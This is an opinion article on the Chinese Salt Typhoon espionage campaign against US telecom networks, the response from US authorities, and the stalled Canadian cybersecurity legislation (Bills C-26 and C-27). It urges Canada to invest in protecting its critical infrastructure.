As military conflicts take centre stage and diplomatic tensions are accompanied by barely concealed hostility, it is essential to remember that these often acrimonious relationships inevitably involve large-scale cyberwar.
While silent and invisible to us, these cyber conflicts are extremely well-funded and occur 24 hours a day globally.
The recent attack by Salt Typhoon, a state-supported cybercriminal group in China, illustrates the scale of modern cyber conflict. The group specialized in cyber-espionage and targets critical infrastructures such as telecommunications networks. These attacks threaten citizens’ sensitive data and undermine the economic and strategic stability of nations.
What happened?
Cyberattackers exploited existing vulnerabilities in network infrastructure, particularly in Cisco-manufactured equipment. The group uses advanced techniques to maintain persistent and discreet access to compromised networks, making detection extremely difficult. For example, they use an approach called “Living-off-the-land,” which is based on legitimate software already in the systems. This method provides an escape from traditional security solutions. It is like knowing that a thief is in your house, listening to you, having access to your cell phone, but not being able to locate or expel them.
They also deployed GhostSpider malware, equipped with sophisticated mechanisms to maintain extended access while remaining discreet. This program uses techniques such as memory execution, further complicating its detection by conventional antivirus.
Who is compromised?
At least eight telecommunications companies were targeted, including AT&T, Verizon, T-Mobile and Lumen Technologies. These intrusions allowed attackers to access call metadata, revealing sensitive information about the communications of many Americans, including senior government officials and politicians.
It would be surprising if Salt Typhoon was limited to U.S. companies. Canadian companies using the same technologies are attractive targets, especially since the risk of retaliation is often perceived as less.
What information was compromised?
Salt Typhoon’s cyberattacks compromised strategic data. This includes call metadata, including information on the source and destination of the call, as well as times and duration of communications. In some cases, attackers have also managed to access communications content, such as calls and text messages, exposing highly confidential information. It is easy to imagine that communications from politicians, military personnel or financiers may have a strategic interest in a competing nation.
What are the attackers’ goals?
The sponsors behind Salt Typhoon have strategic goals focused primarily on espionage and destabilization. The group aims to collect sensitive information about government officials, political figures and strategically important organizations. By compromising critical infrastructure, such as telecommunications networks, attackers also seek to prepare for potential disruptions when conflict or crisis occurs. These actions aim to weaken target countries’ response capacities while reinforcing the strategic advantage of their sponsors. One might think that the Salt Typhoon sponsors are followers of the Latin saying: “Si vis Pacem, para bellum,” translating to “If you want peace, prepare for war.”
How did the authorities respond?
The authorities have strengthened their cybersecurity measures in response to these successful attacks. In the United States, the FBI and the Cybersecurity and Infrastructure Security Agency (CISA) have issued guidelines to encourage telecommunications companies to address vulnerabilities exploited by attackers. The Federal Communications Commission (FCC) has proposed new rules requiring annual certifications to ensure critical infrastructure safety. In addition, calls for increased network traffic monitoring and encrypted communication tools have been launched to reduce the risk of sensitive data exfiltration. These measures aim to reduce the impact of attacks.
The affected telecommunications companies are working to remove this threat from their infrastructure. However, these companies have not yet “fully removed the Chinese actors” from their networks, according to U.S. officials. The U.S. authorities, including the FBI and CISA, are working closely with these companies to assess the extent of compromise and implement remedial measures. Despite these efforts, the attack’s complexity and sophistication make the clean-up process long and arduous, and it is difficult to predict when full removal will be achieved.
Are we prepared for cyberattacks like the Salt Typhoon?
The Salt Typhoon attack raises critical questions about our ability to protect our critical infrastructure against sophisticated threats. This criminal group has demonstrated how vital networks, such as telecommunications, can be infiltrated and exploited without detection for months. If these vulnerabilities exist in the United States, a country with advanced cybersecurity capabilities, it is legitimate to question whether Canada is sufficiently prepared for such an eventuality.
Critical infrastructure, whether telecommunications, energy networks or financial systems, is the backbone of our modern societies. However, their safety often seems put on the back burner in the face of other priorities. While the Canadian Centre for Cyber Security (CCCS) has published recommendations and collaborated with international partners on preventative measures, current efforts appear insufficient to address the scale of threats. Actions remain reactive rather than proactive, leaving a dangerous margin for determined and well-funded attackers.
The real question is, do we have to wait for a digital catastrophe before we consider our critical infrastructure security seriously? Unfortunately, history shows significant security actions often occur after a major crisis. The Salt Typhoon attack could serve as a wake-up call, but the lack of specific impact data in Canada may dilute the sense of urgency. Yet the consequences of such an attack here could be devastating, crippling communications, trade, and even essential services like health.
To avoid disaster, Canada must invest more in protecting its critical infrastructure. This includes not only strengthening technology systems, but also improving collaboration between the public and private sectors, increasing training of cybersecurity experts, and establishing rapid response protocols. Waiting will only exacerbate the risks. Taking action now is necessary to ensure our society’s resilience to increasingly sophisticated threats. Salt Typhoon is probably the tip of the iceberg.
Bill C-26 and Bill C-27 are perfect examples of the worrisome inertia surrounding legislative efforts on cybersecurity in Canada. Bill C-26, introduced in 2022, aims to protect vital cyber systems by strengthening security obligations for critical infrastructure, such as telecommunications and energy. Also introduced in 2022, Bill C-27 aims to modernize the legislative privacy framework and regulate artificial intelligence. These initiatives, while essential, have languished in the legislative process for years.
These two examples highlight a broader problem: the inability to respond quickly to increasing threats. If legislation such as Bill C-26, crucial to critical infrastructure resilience, takes years to pass, it will probably be obsolete before it even comes into force. This disconnect between evolving cyber threats and slow legislative responses raises a worrisome question: Will we wait until a digital disaster strikes before taking serious action? These delays only add to the sense of urgency. Canada must overcome this inertia because every day of inaction makes us more vulnerable to increasingly sophisticated adversaries.